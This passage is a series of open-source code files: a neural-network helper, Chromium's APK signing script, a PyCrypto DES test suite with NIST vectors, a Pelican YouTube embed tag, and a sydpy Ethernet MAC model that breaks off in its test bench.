        T.log(T.sum(T.exp(A - A_max), axis=axis, keepdims=True)) +
        A_max
    )
    # keepdims=True left size-1 dims at the reduced axes; drop them so the
    # result has the shape callers of a plain sum-reduction expect.
    if axis is None:
        return B.dimshuffle(())
    else:
        if type(axis) is int:
            axis = [axis]
        # i % B.ndim normalizes negative axis indices.
        return B.dimshuffle([i for i in range(B.ndim) if
                             i % B.ndim not in axis])
class Identity(Block):
    """
    A Block that computes the identity transformation. Mostly useful as
    a placeholder.

    Parameters
    ----------
    input_space : Space, optional
        Space the inputs are expected to live in; used only to validate
        inputs when set.
    """

    def __init__(self, input_space=None):
        super(Identity, self).__init__()
        self.input_space = input_space

    def __call__(self, inputs):
        """
        Returns ``inputs`` unchanged, first validating them against the
        input space when one has been specified.
        """
        if self.input_space:
            self.input_space.validate(inputs)
        return inputs

    def set_input_space(self, space):
        """
        Sets the space that inputs will be validated against.
        """
        self.input_space = space

    def get_input_space(self):
        """
        Returns the input space; raises ValueError when none has been
        specified yet.
        """
        if self.input_space is not None:
            return self.input_space
        raise ValueError("No input space was specified for this Block (%s). "
                         "You can call set_input_space to correct that." % str(self))

    def get_output_space(self):
        """
        Returns the output space, which for the identity transformation
        is the same as the input space.
        """
        return self.get_input_space()
| bsd-3-clause |
gfreed/android_external_chromium-org | build/android/gyp/finalize_apk.py | 25 | 1902 | #!/usr/bin/env python
#
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Signs and zipaligns APK.
"""
import optparse
import os
import shutil
import sys
import tempfile
from util import build_utils
def SignApk(keystore_path, unsigned_path, signed_path):
  """Copies the unsigned APK to signed_path and signs the copy.

  Uses jarsigner with the 'chromiumdebugkey' entry from the given keystore
  (store password 'chromium').
  """
  shutil.copy(unsigned_path, signed_path)
  jarsigner_args = [
      'jarsigner',
      '-sigalg', 'MD5withRSA',
      '-digestalg', 'SHA1',
      '-keystore', keystore_path,
      '-storepass', 'chromium',
      signed_path,
      'chromiumdebugkey',
  ]
  build_utils.CheckCallDie(jarsigner_args)
def AlignApk(android_sdk_root, unaligned_path, final_path):
  """Runs the SDK's zipalign tool to 4-byte-align the APK into final_path."""
  zipalign_path = os.path.join(android_sdk_root, 'tools', 'zipalign')
  # '-f' overwrites any existing output; '4' is the required alignment.
  build_utils.CheckCallDie([zipalign_path, '-f', '4', unaligned_path, final_path])
def main(argv):
  """Parse options, then sign and zipalign the unsigned APK.

  The signed-but-unaligned APK goes to a temporary file so that
  --final-apk-path only ever contains a fully signed *and* aligned APK.
  """
  parser = optparse.OptionParser()
  parser.add_option('--android-sdk-root', help='Android sdk root directory.')
  parser.add_option('--unsigned-apk-path', help='Path to input unsigned APK.')
  parser.add_option('--final-apk-path',
      help='Path to output signed and aligned APK.')
  parser.add_option('--keystore-path', help='Path to keystore for signing.')
  parser.add_option('--stamp', help='Path to touch on success.')
  # TODO(newt): remove this once http://crbug.com/177552 is fixed in ninja.
  parser.add_option('--ignore', help='Ignored.')
  options, _ = parser.parse_args()
  # NamedTemporaryFile deletes the intermediate signed APK on context exit.
  with tempfile.NamedTemporaryFile() as intermediate_file:
    signed_apk_path = intermediate_file.name
    SignApk(options.keystore_path, options.unsigned_apk_path, signed_apk_path)
    AlignApk(options.android_sdk_root, signed_apk_path, options.final_apk_path)
  if options.stamp:
    build_utils.Touch(options.stamp)
if __name__ == '__main__':
  sys.exit(main(sys.argv))  # Propagate main()'s result as the exit status.
| bsd-3-clause |
szymex/xbmc-finnish-tv | plugin.video.yleareena/win32/Crypto/SelfTest/Cipher/test_DES.py | 119 | 15009 | # -*- coding: utf-8 -*-
#
# SelfTest/Cipher/DES.py: Self-test for the (Single) DES cipher
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-test suite for Crypto.Cipher.DES"""
__revision__ = "$Id$"
from common import dict # For compatibility with Python 2.1 and 2.2
from Crypto.Util.py3compat import *
import unittest
# This is a list of (plaintext, ciphertext, key, description) tuples.
SP800_17_B1_KEY = '01' * 8
SP800_17_B2_PT = '00' * 8
test_data = [
# Test vectors from Appendix A of NIST SP 800-17
# "Modes of Operation Validation System (MOVS): Requirements and Procedures"
# http://csrc.nist.gov/publications/nistpubs/800-17/800-17.pdf
# Appendix A - "Sample Round Outputs for the DES"
('0000000000000000', '82dcbafbdeab6602', '10316e028c8f3b4a',
"NIST SP800-17 A"),
# Table B.1 - Variable Plaintext Known Answer Test
('8000000000000000', '95f8a5e5dd31d900', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #0'),
('4000000000000000', 'dd7f121ca5015619', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #1'),
('2000000000000000', '2e8653104f3834ea', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #2'),
('1000000000000000', '4bd388ff6cd81d4f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #3'),
('0800000000000000', '20b9e767b2fb1456', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #4'),
('0400000000000000', '55579380d77138ef', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #5'),
('0200000000000000', '6cc5defaaf04512f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #6'),
('0100000000000000', '0d9f279ba5d87260', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #7'),
('0080000000000000', 'd9031b0271bd5a0a', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #8'),
('0040000000000000', '424250b37c3dd951', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #9'),
('0020000000000000', 'b8061b7ecd9a21e5', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #10'),
('0010000000000000', 'f15d0f286b65bd28', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #11'),
('0008000000000000', 'add0cc8d6e5deba1', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #12'),
('0004000000000000', 'e6d5f82752ad63d1', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #13'),
('0002000000000000', 'ecbfe3bd3f591a5e', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #14'),
('0001000000000000', 'f356834379d165cd', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #15'),
('0000800000000000', '2b9f982f20037fa9', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #16'),
('0000400000000000', '889de068a16f0be6', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #17'),
('0000200000000000', 'e19e275d846a1298', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #18'),
('0000100000000000', '329a8ed523d71aec', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #19'),
('0000080000000000', 'e7fce22557d23c97', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #20'),
('0000040000000000', '12a9f5817ff2d65d', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #21'),
('0000020000000000', 'a484c3ad38dc9c19', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #22'),
('0000010000000000', 'fbe00a8a1ef8ad72', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #23'),
('0000008000000000', '750d079407521363', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #24'),
('0000004000000000', '64feed9c724c2faf', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #25'),
('0000002000000000', 'f02b263b328e2b60', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #26'),
('0000001000000000', '9d64555a9a10b852', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #27'),
('0000000800000000', 'd106ff0bed5255d7', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #28'),
('0000000400000000', 'e1652c6b138c64a5', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #29'),
('0000000200000000', 'e428581186ec8f46', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #30'),
('0000000100000000', 'aeb5f5ede22d1a36', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #31'),
('0000000080000000', 'e943d7568aec0c5c', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #32'),
('0000000040000000', 'df98c8276f54b04b', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #33'),
('0000000020000000', 'b160e4680f6c696f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #34'),
('0000000010000000', 'fa0752b07d9c4ab8', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #35'),
('0000000008000000', 'ca3a2b036dbc8502', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #36'),
('0000000004000000', '5e0905517bb59bcf', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #37'),
('0000000002000000', '814eeb3b91d90726', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #38'),
('0000000001000000', '4d49db1532919c9f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #39'),
('0000000000800000', '25eb5fc3f8cf0621', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #40'),
('0000000000400000', 'ab6a20c0620d1c6f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #41'),
('0000000000200000', '79e90dbc98f92cca', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #42'),
('0000000000100000', '866ecedd8072bb0e', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #43'),
('0000000000080000', '8b54536f2f3e64a8', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #44'),
('0000000000040000', 'ea51d3975595b86b', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #45'),
('0000000000020000', 'caffc6ac4542de31', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #46'),
('0000000000010000', '8dd45a2ddf90796c', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #47'),
('0000000000008000', '1029d55e880ec2d0', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #48'),
('0000000000004000', '5d86cb23639dbea9', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #49'),
('0000000000002000', '1d1ca853ae7c0c5f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #50'),
('0000000000001000', 'ce332329248f3228', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #51'),
('0000000000000800', '8405d1abe24fb942', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #52'),
('0000000000000400', 'e643d78090ca4207', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #53'),
('0000000000000200', '48221b9937748a23', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #54'),
('0000000000000100', 'dd7c0bbd61fafd54', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #55'),
('0000000000000080', '2fbc291a570db5c4', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #56'),
('0000000000000040', 'e07c30d7e4e26e12', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #57'),
('0000000000000020', '0953e2258e8e90a1', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #58'),
('0000000000000010', '5b711bc4ceebf2ee', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #59'),
('0000000000000008', 'cc083f1e6d9e85f6', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #60'),
('0000000000000004', 'd2fd8867d50d2dfe', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #61'),
('0000000000000002', '06e7ea22ce92708f', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #62'),
('0000000000000001', '166b40b44aba4bd6', SP800_17_B1_KEY,
'NIST SP800-17 B.1 #63'),
# Table B.2 - Variable Key Known Answer Test
(SP800_17_B2_PT, '95a8d72813daa94d', '8001010101010101',
'NIST SP800-17 B.2 #0'),
(SP800_17_B2_PT, '0eec1487dd8c26d5', '4001010101010101',
'NIST SP800-17 B.2 #1'),
(SP800_17_B2_PT, '7ad16ffb79c45926', '2001010101010101',
'NIST SP800-17 B.2 #2'),
(SP800_17_B2_PT, 'd3746294ca6a6cf3', '1001010101010101',
'NIST SP800-17 B.2 #3'),
(SP800_17_B2_PT, '809f5f873c1fd761', '0801010101010101',
'NIST SP800-17 B.2 #4'),
(SP800_17_B2_PT, 'c02faffec989d1fc', '0401010101010101',
'NIST SP800-17 B.2 #5'),
(SP800_17_B2_PT, '4615aa1d33e72f10', '0201010101010101',
'NIST SP800-17 B.2 #6'),
(SP800_17_B2_PT, '2055123350c00858', '0180010101010101',
'NIST SP800-17 B.2 #7'),
(SP800_17_B2_PT, 'df3b99d6577397c8', '0140010101010101',
'NIST SP800-17 B.2 #8'),
(SP800_17_B2_PT, '31fe17369b5288c9', '0120010101010101',
'NIST SP800-17 B.2 #9'),
(SP800_17_B2_PT, 'dfdd3cc64dae1642', '0110010101010101',
'NIST SP800-17 B.2 #10'),
(SP800_17_B2_PT, '178c83ce2b399d94', '0108010101010101',
'NIST SP800-17 B.2 #11'),
(SP800_17_B2_PT, '50f636324a9b7f80', '0104010101010101',
'NIST SP800-17 B.2 #12'),
(SP800_17_B2_PT, 'a8468ee3bc18f06d', '0102010101010101',
'NIST SP800-17 B.2 #13'),
(SP800_17_B2_PT, 'a2dc9e92fd3cde92', '0101800101010101',
'NIST SP800-17 B.2 #14'),
(SP800_17_B2_PT, 'cac09f797d031287', '0101400101010101',
'NIST SP800-17 B.2 #15'),
(SP800_17_B2_PT, '90ba680b22aeb525', '0101200101010101',
'NIST SP800-17 B.2 #16'),
(SP800_17_B2_PT, 'ce7a24f350e280b6', '0101100101010101',
'NIST SP800-17 B.2 #17'),
(SP800_17_B2_PT, '882bff0aa01a0b87', '0101080101010101',
'NIST SP800-17 B.2 #18'),
(SP800_17_B2_PT, '25610288924511c2', '0101040101010101',
'NIST SP800-17 B.2 #19'),
(SP800_17_B2_PT, 'c71516c29c75d170', '0101020101010101',
'NIST SP800-17 B.2 #20'),
(SP800_17_B2_PT, '5199c29a52c9f059', '0101018001010101',
'NIST SP800-17 B.2 #21'),
(SP800_17_B2_PT, 'c22f0a294a71f29f', '0101014001010101',
'NIST SP800-17 B.2 #22'),
(SP800_17_B2_PT, 'ee371483714c02ea', '0101012001010101',
'NIST SP800-17 B.2 #23'),
(SP800_17_B2_PT, 'a81fbd448f9e522f', '0101011001010101',
'NIST SP800-17 B.2 #24'),
(SP800_17_B2_PT, '4f644c92e192dfed', '0101010801010101',
'NIST SP800-17 B.2 #25'),
(SP800_17_B2_PT, '1afa9a66a6df92ae', '0101010401010101',
'NIST SP800-17 B.2 #26'),
(SP800_17_B2_PT, 'b3c1cc715cb879d8', '0101010201010101',
'NIST SP800-17 B.2 #27'),
(SP800_17_B2_PT, '19d032e64ab0bd8b', '0101010180010101',
'NIST SP800-17 B.2 #28'),
(SP800_17_B2_PT, '3cfaa7a7dc8720dc', '0101010140010101',
'NIST SP800-17 B.2 #29'),
(SP800_17_B2_PT, 'b7265f7f447ac6f3', '0101010120010101',
'NIST SP800-17 B.2 #30'),
(SP800_17_B2_PT, '9db73b3c0d163f54', '0101010110010101',
'NIST SP800-17 B.2 #31'),
(SP800_17_B2_PT, '8181b65babf4a975', '0101010108010101',
'NIST SP800-17 B.2 #32'),
(SP800_17_B2_PT, '93c9b64042eaa240', '0101010104010101',
'NIST SP800-17 B.2 #33'),
(SP800_17_B2_PT, '5570530829705592', '0101010102010101',
'NIST SP800-17 B.2 #34'),
(SP800_17_B2_PT, '8638809e878787a0', '0101010101800101',
'NIST SP800-17 B.2 #35'),
(SP800_17_B2_PT, '41b9a79af79ac208', '0101010101400101',
'NIST SP800-17 B.2 #36'),
(SP800_17_B2_PT, '7a9be42f2009a892', '0101010101200101',
'NIST SP800-17 B.2 #37'),
(SP800_17_B2_PT, '29038d56ba6d2745', '0101010101100101',
'NIST SP800-17 B.2 #38'),
(SP800_17_B2_PT, '5495c6abf1e5df51', '0101010101080101',
'NIST SP800-17 B.2 #39'),
(SP800_17_B2_PT, 'ae13dbd561488933', '0101010101040101',
'NIST SP800-17 B.2 #40'),
(SP800_17_B2_PT, '024d1ffa8904e389', '0101010101020101',
'NIST SP800-17 B.2 #41'),
(SP800_17_B2_PT, 'd1399712f99bf02e', '0101010101018001',
'NIST SP800-17 B.2 #42'),
(SP800_17_B2_PT, '14c1d7c1cffec79e', '0101010101014001',
'NIST SP800-17 B.2 #43'),
(SP800_17_B2_PT, '1de5279dae3bed6f', '0101010101012001',
'NIST SP800-17 B.2 #44'),
(SP800_17_B2_PT, 'e941a33f85501303', '0101010101011001',
'NIST SP800-17 B.2 #45'),
(SP800_17_B2_PT, 'da99dbbc9a03f379', '0101010101010801',
'NIST SP800-17 B.2 #46'),
(SP800_17_B2_PT, 'b7fc92f91d8e92e9', '0101010101010401',
'NIST SP800-17 B.2 #47'),
(SP800_17_B2_PT, 'ae8e5caa3ca04e85', '0101010101010201',
'NIST SP800-17 B.2 #48'),
(SP800_17_B2_PT, '9cc62df43b6eed74', '0101010101010180',
'NIST SP800-17 B.2 #49'),
(SP800_17_B2_PT, 'd863dbb5c59a91a0', '0101010101010140',
'NIST SP800-17 B.2 #50'),
(SP800_17_B2_PT, 'a1ab2190545b91d7', '0101010101010120',
'NIST SP800-17 B.2 #51'),
(SP800_17_B2_PT, '0875041e64c570f7', '0101010101010110',
'NIST SP800-17 B.2 #52'),
(SP800_17_B2_PT, '5a594528bebef1cc', '0101010101010108',
'NIST SP800-17 B.2 #53'),
(SP800_17_B2_PT, 'fcdb3291de21f0c0', '0101010101010104',
'NIST SP800-17 B.2 #54'),
(SP800_17_B2_PT, '869efd7f9f265a09', '0101010101010102',
'NIST SP800-17 B.2 #55'),
]
class RonRivestTest(unittest.TestCase):
    """Ronald L. Rivest's DES implementation test, see
    http://people.csail.mit.edu/rivest/Destest.txt

    Starting from X0 = 9474B8E8C73BCA7D (hexadecimal), iterate

        X(i+1) = E(Xi, Xi)  when i is even
        X(i+1) = D(Xi, Xi)  when i is odd

    where E(X, K) and D(X, K) denote DES encryption and decryption of X
    under key K.  A correct implementation yields

        X16 = 1B1A2DDB4C642438

    which, per the paper, rules out all 36,568 single-fault errors
    considered there.
    """
    def runTest(self):
        from Crypto.Cipher import DES
        from binascii import b2a_hex
        # Keep only the running value; the full X0..X16 list is not needed.
        x = b('\x94\x74\xB8\xE8\xC7\x3B\xCA\x7D')
        for step in range(16):
            cipher = DES.new(x, DES.MODE_ECB)
            if step & 1:
                x = cipher.decrypt(x)   # odd step: decrypt
            else:
                x = cipher.encrypt(x)   # even step: encrypt
        self.assertEqual(b2a_hex(x),
                         b2a_hex(b('\x1B\x1A\x2D\xDB\x4C\x64\x24\x38')))
def get_tests(config={}):
    """Return the test cases for Crypto.Cipher.DES: the generated NIST
    SP 800-17 known-answer block tests plus Rivest's recurrence test.
    NOTE(review): the mutable default for 'config' is harmless here since
    config is never used; it is accepted for API compatibility with the
    other self-test modules.
    """
    from Crypto.Cipher import DES
    from common import make_block_tests
    return make_block_tests(DES, "DES", test_data) + [RonRivestTest()]
if __name__ == '__main__':
    # 'unittest' is already imported at module level; the redundant
    # re-import that used to live here has been dropped.
    def suite():
        # Named function instead of a lambda assignment (PEP 8 E731);
        # unittest.main resolves 'suite' by name via defaultTest.
        return unittest.TestSuite(get_tests())
    unittest.main(defaultTest='suite')
# vim:set ts=4 sw=4 sts=4 expandtab:
| gpl-3.0 |
40423127/cpaw5 | plugin/liquid_tags_old/youtube.py | 284 | 1674 | """
Youtube Tag
---------
This implements a Liquid-style youtube tag for Pelican,
based on the jekyll / octopress youtube tag [1]_
Syntax
------
{% youtube id [width height] %}
Example
-------
{% youtube dQw4w9WgXcQ 640 480 %}
Output
------
<iframe
width="640" height="480" src="https://www.youtube.com/embed/dQw4w9WgXcQ"
frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen>
</iframe>
[1] https://gist.github.com/jamieowen/2063748
"""
import re
from .mdx_liquid_tags import LiquidTags
SYNTAX = "{% youtube id [width height] %}"
YOUTUBE = re.compile(r'([\S]+)(\s+(\d+)\s(\d+))?')
@LiquidTags.register('youtube')
def youtube(preprocessor, tag, markup):
    """Render a {% youtube id [width height] %} tag as an embedded
    YouTube iframe; defaults to a 640x390 player when no explicit
    dimensions are given."""
    youtube_id = None
    width, height = 640, 390
    match = YOUTUBE.search(markup)
    if match:
        youtube_id, _, explicit_w, explicit_h = match.groups()
        width = explicit_w or width
        height = explicit_h or height
    if not youtube_id:
        raise ValueError("Error processing input, "
                         "expected syntax: {0}".format(SYNTAX))
    return """
        <div class="videobox">
            <iframe width="{width}" height="{height}"
                src='https://www.youtube.com/embed/{youtube_id}'
                frameborder='0' webkitAllowFullScreen mozallowfullscreen
                allowFullScreen>
            </iframe>
        </div>
    """.format(width=width, height=height, youtube_id=youtube_id).strip()
# ---------------------------------------------------
# This import allows image tag to be a Pelican plugin
from liquid_tags import register # noqa
| mit |
bogdanvuk/sydpy | examples/eth_1g_mac/eth_1g_mac.py | 1 | 9074 | '''
Created on Dec 15, 2014
@author: bvukobratovic
'''
from sydpy import *
from examples.crc32.crc32 import Crc32
import zlib
from sydpy.procs.clk import Clocking
eth_usr_pkt = Struct(
('dest', Vector(6, bit8)),
('src', Vector(6, bit8)),
('len_type', bit16),
('data', Array(bit8, max_size=64))
)
eth_gmii_pkt = Struct(
('pream', Vector(7, bit8)),
('start', bit8),
('dest', Vector(6, bit8)),
('src', Vector(6, bit8)),
('len_type', bit16),
('data', Array(bit8, max_size=64)),
('crc', bit32)
)
# Found the algorithm at: http://www.hackersdelight.org/hdcodetxt/crc.c.txt
def setup_crc_table():
    """Build the 256-entry lookup table for the reflected CRC-32
    (polynomial 0xEDB88320) used by Ethernet.

    Each table entry is the CRC remainder of its index byte after eight
    shift-and-conditionally-xor rounds.
    """
    table = []
    for byte in range(256):
        crc = bit32(byte)
        for _ in range(8):
            # mask is all-ones when the low bit is set, else all-zeros.
            mask = -(int(crc) & 1)
            crc = (crc >> 1) ^ (0xEDB88320 & mask)
        table.append(crc)
    return table
preamble_last_pos = 7
sfd_pos = preamble_last_pos + 1
dest_last_pos = sfd_pos + 6
src_last_pos = dest_last_pos + 6
len_type_first_pos = src_last_pos + 1
len_type_second_pos = len_type_first_pos + 1
class Eth1GMac(Module):
    """1G Ethernet MAC transmit framer.

    Wraps user packets (eth_usr_pkt) into GMII frames (eth_gmii_pkt):
    prepends the 7-byte preamble and SFD, zero-pads the payload to the
    46-byte Ethernet minimum and appends the CRC-32 FCS.  Two
    architectures are provided: a transaction-level model (tlm) and a
    byte-serial RTL implementation (rtl).
    """
    #@arch
    def tlm(self,
            pkt_in : tlm(eth_usr_pkt),
            pkt_out: tlm(eth_gmii_pkt).master
            ):
        """Transaction-level architecture: one whole frame per transaction."""
        @always_acquire(self, pkt_in)
        def proc(pkt):
            # Zero-pad the payload up to the 46-byte Ethernet minimum.
            if len(pkt.data) < 46:
                pkt.data += [bit8(0) for _ in range(46 - len(pkt.data))]
            # NOTE(review): this byte-wise CRC is overwritten by the
            # single-shot computation below; it looks like debugging
            # leftovers (see the commented-out prints).
            crc = 0
            for b in convgen(pkt, bit8):
                crc = zlib.crc32(bytes([int(b)]), crc)
#                 print("{0} -> {1}".format(b, hex(~bit32(crc))))
#             print("Final: {0}".format(hex(bit32(crc))))
            # FCS: CRC-32 over the unframed packet bytes.
            crc = zlib.crc32(bytes(map(int,
                                       convgen(pkt, bit8)
                                       ))
                             )
            # NOTE(review): byte order reversed here, presumably to match
            # the rtl arch which emits crc[31:24] first — confirm.
            crc_rev = list(convgen(bit32(crc), bit8))[::-1]
            # Assemble the GMII frame: preamble, SFD, header, payload, FCS.
            pkt_gmii = eth_gmii_pkt([
                                     [bit8(0x55) for _ in range(7)],
                                     bit8(0xd5),
                                     pkt.dest,
                                     pkt.src,
                                     pkt.len_type,
                                     pkt.data,
                                     conv(crc_rev, bit32)
                                     ])
            pkt_out.next = pkt_gmii
#             s = ''
#
#             print(hex(crc))
#
#             print(str(conv(crc_rev, bit32)))
#
#             for b in convgen(pkt_gmii[2:6], bit8):
#                 s += str(b)[2:]
#
#             print(s)
#
    #@arch_def
    def rtl(self,
            clk : sig(bit),
            pkt_in : seq(bit8),
            pkt_out : seq(bit8).master
            ):
        """RTL architecture: byte-serial framing driven by an FSM."""
        # CRC-32 engine: consumes bytes on 'crc_data', result on 'crc'.
        self.inst(Crc32,
                  clk = clk,
                  crc_in = 'crc_data',
                  crc_out='crc',
                  )
        pkt_in.clk <<= clk
        pkt_out.clk <<= clk
        crc_data = self.seq(bit8, 'crc_data', clk=clk, init=0)
        crc = self.seq(bit32, slave='crc', clk=clk)
        # One state per frame field; crc3..crc0 emit the FCS MSB-first.
        fsm_states = Enum('idle', 'preamble', 'sfd', 'dest', 'src', 'len_type', 'data', 'pad', 'crc0', 'crc1', 'crc2', 'crc3', 'pkt_end')
        fsm_state = self.seq(fsm_states, 'fsm_state', clk=clk, init='idle')
        len_type = self.seq(bit16, 'len_type', clk=clk)
        pkt_cnt = self.sig(bit16, 'pkt_cnt', init=0)
        # Accept input bytes only in the states that consume them.
        pkt_in.ready <<= (fsm_state == ['idle', 'dest', 'src', 'len_type', 'data'])
        pkt_in_last_reg = self.seq(bit, clk=clk)
        pkt_in_last_reg.data <<= pkt_in.last
        @always(self, clk.e.posedge)
        def pkt_cnt_proc():
            # Byte position within the current frame (restarts at 1).
            if fsm_state in ['idle', 'pkt_end']:
                pkt_cnt.next = 1
            else:
                pkt_cnt.next = pkt_cnt + 1
        @always_comb(self) #, fsm_state, pkt_in, crc_out)
        def pkt_out_intf():
            # Drive the output byte stream according to the FSM state.
            if fsm_state in ('idle', 'pkt_end'):
                pkt_out.valid.next = False
            else:
                pkt_out.valid.next = True
            if fsm_state == 'idle':
                pkt_out.next = 0
            elif fsm_state == 'preamble':
                pkt_out.next = 0x55
            elif fsm_state == 'sfd':
                pkt_out.next = 0xd5
            elif fsm_state in ('dest', 'src', 'len_type', 'data'):
                # Header and payload bytes pass straight through.
                pkt_out.next = pkt_in
            elif fsm_state == 'pad':
                pkt_out.next = 0
            elif fsm_state == 'crc3':
                # NOTE(review): the bare excepts below presumably guard
                # against 'crc' being undefined/unresolved — confirm.
                try:
                    pkt_out.next = bit8(crc >> 24)
                except:
                    pkt_out.next = 0xff
            elif fsm_state == 'crc2':
                try:
                    pkt_out.next = bit8(crc >> 16)
                except:
                    pkt_out.next = 0xff
            elif fsm_state == 'crc1':
                try:
                    pkt_out.next = bit8(crc >> 8)
                except:
                    pkt_out.next = 0xff
            elif fsm_state == 'crc0':
                try:
                    pkt_out.next = bit8(crc)
                except:
                    pkt_out.next = 0xff
            # The frame ends with the last FCS byte.
            if fsm_state == 'crc0':
                pkt_out.last.next = True
            else:
                pkt_out.last.next = False
        @always_comb(self)
        def fsm_proc():
            # State transitions; crc_data.last flags the final CRC input byte.
            crc_data.last.next = 0
            if fsm_state == 'idle':
                if pkt_in.valid:
                    len_type.next = 0
                    fsm_state.next = 'preamble'
            elif fsm_state == 'preamble':
                if pkt_cnt == preamble_last_pos:
                    fsm_state.next = 'sfd'
            elif fsm_state == 'sfd':
                fsm_state.next = 'dest'
            elif fsm_state == 'dest':
                if pkt_cnt == dest_last_pos:
                    fsm_state.next = 'src'
            elif fsm_state == 'src':
                if pkt_cnt == src_last_pos:
                    fsm_state.next = 'len_type'
            elif fsm_state == 'len_type':
                # len_type arrives low byte first.
                if pkt_cnt == len_type_first_pos:
                    len_type[7:0].next = pkt_in
                elif pkt_cnt == len_type_second_pos:
                    len_type[15:8].next = pkt_in
                    fsm_state.next = 'data'
            elif fsm_state == 'data':
                # Pad short frames; otherwise go straight to the FCS.
                if (pkt_cnt == len_type_second_pos + len_type) or \
                    (pkt_in_last_reg and pkt_cnt < 60 + sfd_pos):
                    fsm_state.next = 'pad'
                elif pkt_in_last_reg:
                    fsm_state.next = 'crc3'
                    crc_data.last.next = 1
            elif fsm_state == 'pad':
                if pkt_in_last_reg or pkt_cnt == 60 + sfd_pos:
                    fsm_state.next = 'crc3'
                    crc_data.last.next = 1
            elif fsm_state == 'crc3':
                fsm_state.next = 'crc2'
            elif fsm_state == 'crc2':
                fsm_state.next = 'crc1'
            elif fsm_state == 'crc1':
                fsm_state.next = 'crc0'
            elif fsm_state == 'crc0':
                fsm_state.next = 'pkt_end'
            elif fsm_state == 'pkt_end':
                # Back-to-back frames skip the idle state.
                if pkt_in.valid:
                    fsm_state.next = 'preamble'
                else:
                    fsm_state.next = 'idle'
        @always_comb(self)
        def crc_sig_gen():
            # Feed the CRC engine: header/payload bytes, zeros while padding.
            if fsm_state == 'pad':
                crc_data.valid.next = 1
                crc_data.data.next = 0
            else:
                crc_data.valid.next = (fsm_state in ['dest', 'src', 'len_type', 'data', 'pad'])
                crc_data.data.next = pkt_in
if __name__ == "__main__":
    # Self-test bench: drives random user packets into both architectures
    # of Eth1GMac and compares their outputs with a scoreboard.
    class TestDFF(Module):
        #@arch_def
        def test1(self):
            self.inst(Clocking, clk_o='clk', period=10)
